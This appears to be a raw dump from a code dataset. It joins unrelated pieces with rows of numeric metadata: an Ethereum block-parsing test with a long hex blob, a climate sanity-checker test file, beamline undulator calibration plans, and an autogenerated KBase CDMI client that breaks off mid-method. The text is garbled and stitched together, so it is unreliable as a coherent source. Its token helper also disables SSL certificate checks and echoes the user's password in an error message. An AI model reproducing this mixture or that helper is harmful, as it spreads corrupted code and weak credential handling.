a420663d3f0ee60b1ad6f207129591d8bc64e377b8e8235f901ae8305b6ed8510c388d00083034db994d1669ac6044269b59fa12c5822439f609ca54f4180b901440dcd7a6c000000000000000000000000d0e2dbe16d6cadc55f032ac325d1f4d6e927c2f4000000000000000000000000000000000000000000000000000000004190ab00000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000000608ccae3000000000000000000000000000000000000000000000000000000000007a36700000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000041d33cff666a85d38ab54babe820b3e602fe4a745564d68f2994c870c50ed0cb907f5f4d24d339acab428445af5736bb6f3363cab2ba3af627126f7b153de772701b000000000000000000000000000000000000000000000000000000000000001ba07996df97c5a59dfe6351b1077e6832647d9d3d09e0775870a9c865a7ee9db4baa03ad71e8b981be90726ff2c1c34fae3e054689765039bd823b9744b4429745bf1f86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578025a060a0e999f8524a4f81a87e1dd43960880572598678390d42fc951196d9b3cc31a0143c72a08366f1482bca12048ccb2ca6cb389c1136a98fc158a351f8b20a449df86b028510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa870f21cf8f7de8018026a080330076b080346ae155f7046495036fcfc0172e882723868d7b335ff5b12a70a063b44999d471dd99c9110d98e471a59988049f6d2174f5c6f15c8a5eaab6a169f86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578025a0c5fd6fbf175e557c916088fa289d860ff5704796c1dc2c06e669f8996de89920a04fa529e03dcb662feb499ba2ee743910d787d9bc30c46b21b46212714a739c5af86b018510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578026a07d01be687de6441d1c967aaceeb5c7f8b73f5df575d10558569ad3ab7de0ac76a00f7a9c80861395c601835a08919a54045e371d45584b690c3dd819944cc5f7cdf86b028510a1798124825208946fbae3ec8bf83d877c08bf078d0b87c25edadffa8709f295cd5f1b578026a0bca0cb0d37795c8ce10a588d346128ab82ec3a945ce66e7156218226bfec2cdaa0627d7ae2a734abe6d73e595bb8fbd7a403b9cda614c4104990f681cb879b36f6f90218f90215a06acde3d3a26aa1192eac36eae2e505da2b8026b14675c5e91178850fe4d1973aa01dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d4934794ea674fdde714fd979de3edf0f56aa9716b898ec8a011aa238c96c84ead25e422a352b56a62f6849f6cb5a42e5d32cc473079125738a0b32b074e75dd1fc100ba9937ebd313952524745dd88d8d54979a140818ee3cb5a0df7a875023b9e05aa07d2a3a25a55a4cbf7a5066901f078fe399f09ca434572eb9010002f0e14d601a70bd90020ea3d6211ac4791c9624ca963d842879908748a00c69549d8d4b11870cd0b853d945016009da6310c02d0879de58f2d0d3f211a890427ac1d2830bc7ea2b6c7f90e833fd6ee6fcd01704c1d85b1b806af628823690883aac4644e77efa381585c8171f72aa605e42386917325ed2c86246d531043139adcec5920ac823ac3055040bd1205084b82585f38b2a9418fa6a206722daae6306d70948b54724b44e1742a09f7664235b2b824900954e03287257001f18e8452c55ad924de4e0cb0d1b5984ca4104dd2dd4934b594f80b01e0c31ba18d264f92274e23eaa4b0481404880f3029122a366e43e3581a6b14120c7d52590f2312b87182282e4ca07f683bbb0d683e4c37283e476e884608390629465746865726d696e652d617369612d6561737432a0bdd4944795488cc326db18ad9e73d8d4f294a0335e687ec5a1bc171708e32a6488f058a9cbbd0789598a0504ace7ef771bc094b7"
msg_block_bytes = convert.hex_to_bytes(msg_block_str)
msg = NewBlockEthProtocolMessage(msg_block_bytes)
# Block-level fields parsed straight from the raw NewBlock payload
self.assertEqual(12300503, msg.number())
self.assertEqual(1619234938, msg.timestamp())
self.assertEqual("675c38a69645a47c8c81495a65c2903c044e1300283f8bad065987e8b3065b22", msg.block_hash().to_string())
self.assertEqual(23698078580832053793975, msg.get_chain_difficulty())
# The embedded header bytes should RLP-decode on their own and agree with
# the message-level accessors above
block_header = bytearray(msg.block_header())
block_header_rlp = rlp.decode(block_header, BlockHeader)
self.assertEqual(12300503, block_header_rlp.number)
self.assertEqual(1619234938, block_header_rlp.timestamp)
self.assertEqual("675c38a69645a47c8c81495a65c2903c044e1300283f8bad065987e8b3065b22", Sha256Hash(block_header_rlp.hash()).to_string())
| 1,203.707965
| 131,108
| 0.990509
| 563
| 136,019
| 238.973357
| 0.243339
| 0.000832
| 0.000803
| 0.000684
| 0.007143
| 0.006184
| 0.005768
| 0.005768
| 0.005143
| 0.004645
| 0
| 0.724275
| 0.006874
| 136,019
| 112
| 131,109
| 1,214.455357
| 0.271712
| 0
| 0
| 0.178947
| 0
| 0
| 0.964792
| 0.964645
| 0
| 1
| 0
| 0
| 0.105263
| 1
| 0.063158
| false
| 0
| 0.2
| 0
| 0.284211
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| c230da5fa7ff00e04c795146241c6227864dd81b
| 3,635
| py
| Python
| testsuite/test_welch_run.py
| C2SM/clim-sanity-checker
| 3d5d610b16ca7e87c841ef7ad06a94d0399b4773
| ["MIT"] | null | null | null
| testsuite/test_welch_run.py
| C2SM/clim-sanity-checker
| 3d5d610b16ca7e87c841ef7ad06a94d0399b4773
| ["MIT"] | 3
| 2021-07-29T11:26:20.000Z
| 2021-07-29T16:01:54.000Z
| testsuite/test_welch_run.py
| C2SM/clim-sanity-checker
| 3d5d610b16ca7e87c841ef7ad06a94d0399b4773
| ["MIT"] | null | null | null
import shutil
import testsuite.utils as utils


def test_welch_first_ref():
    input_dir = 'testsuite/data'
    exp_name = 'first-ref'
    files_generated = utils.generate_data(input_dir,
                                          exp_name,
                                          '2d_A',
                                          'TSURF')
    files_generated.extend(utils.generate_data(input_dir,
                                               exp_name,
                                               '2d_B',
                                               'T2M'))
    cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
    status, _ = utils.shell_cmd(cmd)
    assert status == 0, 'paths_init.py failed'
    ref_dir = 'testsuite/first_ref'
    shutil.rmtree(ref_dir, ignore_errors=True)
    cmd = 'python sanity_test.py -e {} -t welch --spinup 0 \
        --p_stages testsuite/stages \
        --wrkdir testsuite/workdir \
        --p_ref_csv_files {} --f_vars_to_extract \
        vars_welchs_test.csv -c -ts'.format(exp_name, ref_dir)
    status, _ = utils.shell_cmd(cmd)
    utils.delete_data(files_generated)
    assert status == 0, 'sanity_test.py failed'


def test_welch_embed():
    input_dir = 'testsuite/data'
    exp_name = 'run_embed'
    files_generated = utils.generate_data(input_dir,
                                          exp_name,
                                          '2d_A',
                                          'TSURF')
    files_generated.extend(utils.generate_data(input_dir,
                                               exp_name,
                                               '2d_B',
                                               'T2M'))
    cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
    status, _ = utils.shell_cmd(cmd)
    assert status == 0, 'paths_init.py failed'
    cmd = 'python sanity_test.py -e {} -t welch --spinup 0 \
        --p_stages testsuite/stages \
        --wrkdir testsuite/workdir \
        --p_ref_csv_files testsuite/ref --f_vars_to_extract \
        vars_welchs_test.csv -c -ts'.format(exp_name)
    status, _ = utils.shell_cmd(cmd)
    utils.delete_data(files_generated)
    assert status == 0, 'sanity_test.py failed'


def test_welch_chained():
    input_dir = 'testsuite/data'
    exp_name = 'run_chained'
    files_generated = utils.generate_data(input_dir,
                                          exp_name,
                                          '2d_A',
                                          'TSURF')
    files_generated.extend(utils.generate_data(input_dir,
                                               exp_name,
                                               '2d_B',
                                               'T2M'))
    cmd = 'python paths_init.py -pr {} -ts'.format(input_dir)
    status, _ = utils.shell_cmd(cmd)
    assert status == 0, 'paths_init.py failed'
    cmd = 'python process_data.py -e {} -t welch --spinup 0 \
        --p_stages testsuite/stages \
        --wrkdir testsuite/workdir \
        --f_vars_to_extract vars_welchs_test.csv \
        -c'.format(exp_name)
    status, _ = utils.shell_cmd(cmd)
    assert status == 0, 'process_data.py failed'
    cmd = 'python perform_test.py -e {} -t welch \
        --p_stages testsuite/stages \
        --wrkdir testsuite/workdir \
        --p_ref_csv_files testsuite/ref --f_vars_to_extract \
        vars_welchs_test.csv -ts'.format(exp_name)
    status, _ = utils.shell_cmd(cmd)
    utils.delete_data(files_generated)
    assert status == 0, 'perform_test.py failed'
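All three tests drive the checker through its command-line scripts via utils.shell_cmd, which is assumed to return an (exit status, output) pair. A minimal sketch of what such a helper could look like (hypothetical; the real testsuite/utils.py may differ):

import subprocess

def shell_cmd(cmd):
    # Run cmd through a shell, merging stderr into stdout, and return the
    # (status, output) tuple the tests above unpack.
    proc = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT)
    return proc.returncode, proc.stdout.decode()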
| 33.045455
| 66
| 0.510316
| 394
| 3,635
| 4.393401
| 0.15736
| 0.052571
| 0.064702
| 0.076834
| 0.875217
| 0.867707
| 0.849798
| 0.81398
| 0.786251
| 0.767764
| 0
| 0.008613
| 0.393122
| 3,635
| 109
| 67
| 33.348624
| 0.776065
| 0
| 0
| 0.74026
| 1
| 0
| 0.103714
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.038961
| false
| 0
| 0.025974
| 0
| 0.064935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| c238ef60c05473ff43637530349512c5d6f2b36a
| 11,394
| py
| Python
| plans/epu-cal-plan.py
| mrakitin/profile_collection-six
| 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
| ["BSD-3-Clause"] | null | null | null
| plans/epu-cal-plan.py
| mrakitin/profile_collection-six
| 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
| ["BSD-3-Clause"] | 30
| 2017-05-18T19:11:24.000Z
| 2021-06-23T16:59:26.000Z
| plans/epu-cal-plan.py
| mrakitin/profile_collection-six
| 20e41632b9898ac83a8e60fcca9b8aeaaa91f0ad
| ["BSD-3-Clause"] | 3
| 2018-01-10T17:16:47.000Z
| 2020-03-12T14:51:36.000Z
def epu_calib_gr1800_Aug2019(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    yield from gcdiag.diode
    # srs settings for diode = SRS settings: 5 x1 uA/v , time = 1.0
    yield from mv(m1_simple_fbk,0)
    yield from mv(m3_simple_fbk,0)
    # PHASE = 0 mm
    yield from mv(epu1.phase, 0)
    yield from mv(epu1.table,1)
    yield from sleep(30)
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,5.2707)
    for i in range(250,1351,50):
        yield from mv(pgm.en,i)
        yield from sleep(5)
        start_gap = epu1.gap.readback.value
        yield from mv(epu1.gap,start_gap-1.5)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,3,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    # PHASE = 28.5 mm
    yield from mv(epu1.phase, 28.5)
    yield from mv(epu1.table,3)
    yield from sleep(30)
    yield from mv(pgm.en,850)
    yield from beamline_align_v2()
    yield from mv(m1_simple_fbk,0)
    yield from mv(m3_simple_fbk,0)
    yield from mv(pgm.en,350)
    yield from sleep(5)
    yield from mv(epu1.gap,18.01)
    yield from sleep(10)
    yield from rel_scan(dets, epu1.gap,0,2,31)
    yield from mv(epu1.gap, 18.01)
    yield from sleep(10)
    yield from rel_scan(dets, epu1.gap,0,1,51)
    for i in range(400,1351,50):
        yield from mv(pgm.en,i)
        yield from sleep(5)
        start_gap = epu1.gap.readback.value
        yield from mv(epu1.gap,start_gap-1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    # LEAVING THE BEAMLINE READY FOR NEXT TEST
    yield from mv(epu1.phase, 0)
    yield from mv(epu1.table,1)
    yield from sleep(30)
    yield from mv(pgm.en,530)
    yield from beamline_align_v2()


def epu_calib_gr500(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
    yield from gcdiag.diode
    # srs settings for diode = SRS settings: 5 x10 uA/v , time = 1.0
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,2.32)
    yield from mv(extslt.hg,300)
    yield from mv(extslt.vg,30)
    #180 eV
    yield from mv(pgm.en,180)
    yield from mv(epu1.gap, 18.01)
    yield from sleep(10)
    yield from rel_scan(dets,epu1.gap,0,1.5,76)
    yield from mv(epu1.gap, 18.01)
    yield from sleep(10)
    yield from rel_scan(dets, epu1.gap,0,1.5,76)
    for i in range(200,1351,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-2)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,6,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    yield from sleep(100)
    #800-1600 eV, 3rd harmonic
    for i in range(800,1601,50):
        calc_gap=e2g(i/3)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-2)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,4,41)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,1.0,76)
    calc_gap=e2g(850)
    yield from mv(pgm.en,850)
    yield from sleep(5)
    yield from mv(epu1.gap,39.387)
    yield from mv(shutterb,'close')
    print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')


def epu_calib_gr1800(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
    yield from gcdiag.diode
    # srs settings for diode = SRS settings: 5 x1 uA/v , time = 1.0
    yield from mv(epu1.phase, 0)
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,5.2707)
    for i in range(250,1351,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-2)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,6,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    yield from sleep(100)
    #800-1550 eV, 3rd harmonic
    #for i in range(800,2001,50):
    #calc_gap=e2g(i/3)
    #yield from mv(pgm.en,i)
    #yield from sleep(5)
    #yield from mv(epu1.gap,calc_gap-2)
    #yield from sleep(10)
    #yield from rel_scan(dets, epu1.gap,0,4,41)
    #yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
    #yield from sleep(10)
    #yield from rel_scan(dets, epu1.gap,0,1.0,76)
    calc_gap=e2g(850)
    yield from mv(pgm.en,850)
    yield from sleep(5)
    yield from mv(epu1.gap,calc_gap)


def epu_calib_ph28p5_gr500(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
    yield from gcdiag.diode
    yield from mv(extslt.hg,300)
    yield from mv(extslt.vg,30)
    # srs settings for diode = SRS settings: 5 x10 uA/v , time = 1.0
    # Current gap limit is 18mm
    yield from mv(epu1.phase, 28.5)
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,2.24)
    #1st Harmonic at 320 eV
    #yield from mv(pgm.en,320,epu1.gap,17.05)
    #yield from sleep(10)
    #yield from rel_scan(dets,epu1.gap,0,1,30)
    #yield from mv(epu1.gap,17.05)
    #yield from sleep(10)
    #yield from rel_scan(dets,epu1.gap,0,1,50)
    #1st Harmonic
    for i in range(400,451,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,3,30)
        yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-1)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,2,100)
    for i in range(500,1351,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,6,30)
        yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-1)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,2,100)
    yield from sleep(100)
    #3rd Harmonic
    for i in range(1100,1601,50):
        calc_gap=e2g(i/3)
        yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,2,30)
        yield from mv(epu1.gap,peaks['max']['sclr_channels_chan2'][0]-0.5)
        yield from sleep(10)
        yield from rel_scan(dets,epu1.gap,0,1.0,75)
    yield from mv(pgm.en,931.6)
    yield from sleep(5)
    yield from mv(epu1.gap,29.56)
    yield from mv(shutterb,'close')


def epu_calib_ph28p5_gr1800(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
    yield from gcdiag.diode
    # srs settings for diode = SRS settings: 5 x1 uA/v
    # Current gap limit is 18mm
    yield from mv(epu1.phase, 28.5)
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,5.2707)
    yield from mv(pgm.en,350)
    yield from sleep(5)
    yield from mv(epu1.gap,18.01)
    yield from sleep(10)
    yield from rel_scan(dets, epu1.gap,0,2,31)
    yield from mv(epu1.gap, 18.01)
    yield from sleep(10)
    yield from rel_scan(dets, epu1.gap,0,1,51)
    for i in range(400,451,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,3,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    for i in range(500,1351,50):
        calc_gap=e2g(i)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-2-7.8 -(i-350)*0.0067)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,3,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] -1)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,101)
    yield from sleep(30)
    #800-1550 eV, 3rd harmonic
    #for i in range(1100,2001,50):
    #calc_gap=e2g(i/3)
    #yield from mv(pgm.en,i)
    #yield from sleep(5)
    #yield from mv(epu1.gap,calc_gap-8.5-(i-1000)*0.0027)
    #yield from sleep(10)
    #yield from rel_scan(dets, epu1.gap,0,2,31)
    #yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
    #yield from sleep(10)
    #yield from rel_scan(dets, epu1.gap,0,1.0,76)
    calc_gap=e2g(850)
    yield from mv(pgm.en,530)
    yield from sleep(5)
    yield from mv(epu1.phase,0)
    yield from mv(epu1.gap,28.01)
    yield from mv(shutterb,'close')
    print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')


def epu_calib_ph28p5_gr1800_v2(dets = [sclr, ring_curr]):
    print('\n\n WARNING WARNING WARNING:\n\t check if there scalar is installed or not!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t this assumes epu interpolation table is DISABLED!!!!')
    yield from gcdiag.diode
    # srs settings for diode = SRS settings: 5 x1 uA/v
    # Current gap limit is 18mm
    yield from mv(epu1.phase, 28.5)
    #yield from mv(feslt.hg,2.0)
    #yield from mv(feslt.vg,2.0)
    #yield from bp.mv(pgm.cff,5.2707)
    yield from sleep(30)
    #800-1550 eV, 3rd harmonic
    for i in range(1100,2001,50):
        calc_gap=e2g(i/3)
        yield from mv(pgm.en,i)
        yield from sleep(5)
        yield from mv(epu1.gap,calc_gap-8.5-(i-1000)*0.0027)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,2,31)
        yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0]-0.5)
        yield from sleep(10)
        yield from rel_scan(dets, epu1.gap,0,1.0,76)
    calc_gap=e2g(850)
    yield from mv(pgm.en,850)
    yield from sleep(5)
    yield from mv(epu1.gap,28.01)
    yield from mv(shutterb,'close')
    print('\n\n WARNING WARNING WARNING:\n\t EPU Table/Interpolation disabled!!!!')
    print('\n\n WARNING WARNING WARNING:\n\t M1 Feedback disabled!!!!')
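Each calibration loop above repeats one motif: set the photon energy, park the gap below its expected value, coarse-scan, re-center on the strongest scaler peak, then fine-scan. A hypothetical helper that factors the motif out (mv, sleep, rel_scan, peaks, pgm and epu1 are the same beamline globals the plans already use; parameter names and defaults are illustrative only):

def scan_gap_at_energy(dets, energy, start_gap,
                       coarse_width=3, coarse_points=31,
                       fine_width=2, fine_points=101):
    # Move to the requested energy and a deliberately low starting gap.
    yield from mv(pgm.en, energy)
    yield from sleep(5)
    yield from mv(epu1.gap, start_gap)
    yield from sleep(10)
    # Coarse scan to locate the flux peak, then re-center just below it.
    yield from rel_scan(dets, epu1.gap, 0, coarse_width, coarse_points)
    yield from mv(epu1.gap, peaks['max']['sclr_channels_chan2'][0] - 1)
    yield from sleep(10)
    # Fine scan for the calibration record.
    yield from rel_scan(dets, epu1.gap, 0, fine_width, fine_points)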
| 34.113772
| 99
| 0.626558
| 2,016
| 11,394
| 3.478671
| 0.071429
| 0.25795
| 0.14744
| 0.098389
| 0.972765
| 0.956224
| 0.948667
| 0.944959
| 0.934693
| 0.919435
| 0
| 0.104414
| 0.238459
| 11,394
| 333
| 100
| 34.216216
| 0.703815
| 0.177374
| 0
| 0.857143
| 0
| 0
| 0.166577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0
| 0
| 0.028571
| 0.080952
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| dfd3db12939f914636be4a1513f7e352e388ac3d
| 898,814
| py
| Python
| src/biokbase/cdmi/client.py
| teharrison/narrative
| 71e2c49dfd1426d4a05e1f078946eaa271cae46a
| ["MIT"] | null | null | null
| src/biokbase/cdmi/client.py
| teharrison/narrative
| 71e2c49dfd1426d4a05e1f078946eaa271cae46a
| ["MIT"] | null | null | null
| src/biokbase/cdmi/client.py
| teharrison/narrative
| 71e2c49dfd1426d4a05e1f078946eaa271cae46a
| ["MIT"] | null | null | null
############################################################
#
# Autogenerated by the KBase type compiler -
# any changes made here will be overwritten
#
# Passes on URLError, timeout, and BadStatusLine exceptions.
# See:
# http://docs.python.org/2/library/urllib2.html
# http://docs.python.org/2/library/httplib.html
#
############################################################
try:
    import json
except ImportError:
    import sys
    sys.path.append('simplejson-2.3.3')
    import simplejson as json
import urllib2
import httplib
import urlparse
import random
import base64
import httplib2
from urllib2 import URLError, HTTPError
from ConfigParser import ConfigParser
import os

_CT = 'content-type'
_AJ = 'application/json'
_URL_SCHEME = frozenset(['http', 'https'])


def _get_token(user_id, password,
               auth_svc='https://nexus.api.globusonline.org/goauth/token?' +
               'grant_type=client_credentials'):
    # This is bandaid helper function until we get a full
    # KBase python auth client released
    h = httplib2.Http(disable_ssl_certificate_validation=True)
    auth = base64.encodestring(user_id + ':' + password)
    headers = {'Authorization': 'Basic ' + auth}
    h.add_credentials(user_id, password)
    h.follow_all_redirects = True
    url = auth_svc
    resp, content = h.request(url, 'GET', headers=headers)
    status = int(resp['status'])
    if status >= 200 and status <= 299:
        tok = json.loads(content)
    elif status == 403:
        raise Exception('Authentication failed: Bad user_id/password ' +
                        'combination %s:%s' % (user_id, password))
    else:
        raise Exception(str(resp))
    return tok['access_token']


def _read_rcfile(file=os.environ['HOME'] + '/.authrc'):  # @ReservedAssignment
    # Another bandaid to read in the ~/.authrc file if one is present
    authdata = None
    if os.path.exists(file):
        try:
            with open(file) as authrc:
                rawdata = json.load(authrc)
                # strip down whatever we read to only what is legit
                authdata = {x: rawdata.get(x) for x in (
                    'user_id', 'token', 'client_secret', 'keyfile',
                    'keyfile_passphrase', 'password')}
        except Exception, e:
            print "Error while reading authrc file %s: %s" % (file, e)
    return authdata


def _read_inifile(file=os.environ.get(  # @ReservedAssignment
        'KB_DEPLOYMENT_CONFIG', os.environ['HOME'] +
        '/.kbase_config')):
    # Another bandaid to read in the ~/.kbase_config file if one is present
    authdata = None
    if os.path.exists(file):
        try:
            config = ConfigParser()
            config.read(file)
            # strip down whatever we read to only what is legit
            authdata = {x: config.get('authentication', x)
                        if config.has_option('authentication', x)
                        else None for x in
                        ('user_id', 'token', 'client_secret',
                         'keyfile', 'keyfile_passphrase', 'password')}
        except Exception, e:
            print "Error while reading INI file %s: %s" % (file, e)
    return authdata


class ServerError(Exception):

    def __init__(self, name, code, message, data=None, error=None):
        self.name = name
        self.code = code
        self.message = '' if message is None else message
        self.data = data or error or ''
        # data = JSON RPC 2.0, error = 1.1

    def __str__(self):
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data


class JSONObjectEncoder(json.JSONEncoder):

    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        if isinstance(obj, frozenset):
            return list(obj)
        return json.JSONEncoder.default(self, obj)
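# All CDMI_API methods below follow one JSON-RPC 1.1 call pattern: build an
# arg_hash naming the remote method and its params, POST it to self.url with
# urllib2, map a JSON error body onto ServerError, and return
# resp['result'][0]. Only the method name and parameter list differ; the
# bodies are verbatim repeats because the file is compiler-generated.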
class CDMI_API(object):
def __init__(self, url=None, timeout=30 * 60, user_id=None,
password=None, token=None, ignore_authrc=False):
if url is None:
url = 'http://kbase.us/services/cdmi_api'
scheme, _, _, _, _, _ = urlparse.urlparse(url)
if scheme not in _URL_SCHEME:
raise ValueError(url + " isn't a valid http url")
self.url = url
self.timeout = int(timeout)
self._headers = dict()
# token overrides user_id and password
if token is not None:
self._headers['AUTHORIZATION'] = token
elif user_id is not None and password is not None:
self._headers['AUTHORIZATION'] = _get_token(user_id, password)
elif 'KB_AUTH_TOKEN' in os.environ:
self._headers['AUTHORIZATION'] = os.environ.get('KB_AUTH_TOKEN')
elif not ignore_authrc:
authdata = _read_inifile()
if authdata is None:
authdata = _read_rcfile()
if authdata is not None:
if authdata.get('token') is not None:
self._headers['AUTHORIZATION'] = authdata['token']
elif(authdata.get('user_id') is not None
and authdata.get('password') is not None):
self._headers['AUTHORIZATION'] = _get_token(
authdata['user_id'], authdata['password'])
if self.timeout < 1:
raise ValueError('Timeout value must be at least 1 second')
def fids_to_annotations(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_annotations',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_functions(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_functions',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
